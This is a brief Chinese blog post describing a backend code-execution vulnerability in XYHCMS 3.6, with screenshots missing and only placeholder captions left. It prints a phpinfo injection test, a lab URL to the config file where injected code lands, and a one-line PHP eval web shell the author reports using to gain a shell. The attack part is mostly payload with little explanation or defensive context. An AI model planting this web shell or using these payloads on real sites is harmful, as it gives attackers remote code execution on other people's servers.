XYHCMS 3.6 后台代码执行漏洞

时间  2020-12-29 标签 php web shell svg 3d xml blog 图片 it 后台

XYHCMS 3.6 后台代码执行漏洞php

<?=phpinfo();?>

在这里插入图片描述
http://192.168.107.131:1026/App/Runtime/Data/config/site.php
在这里插入图片描述
通过屡次实验终于拿到shell <?php @eval($_POST[5]);?>
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
须要环境的私聊后期会放到站上web

联系我们 沪ICP备2021010478号-7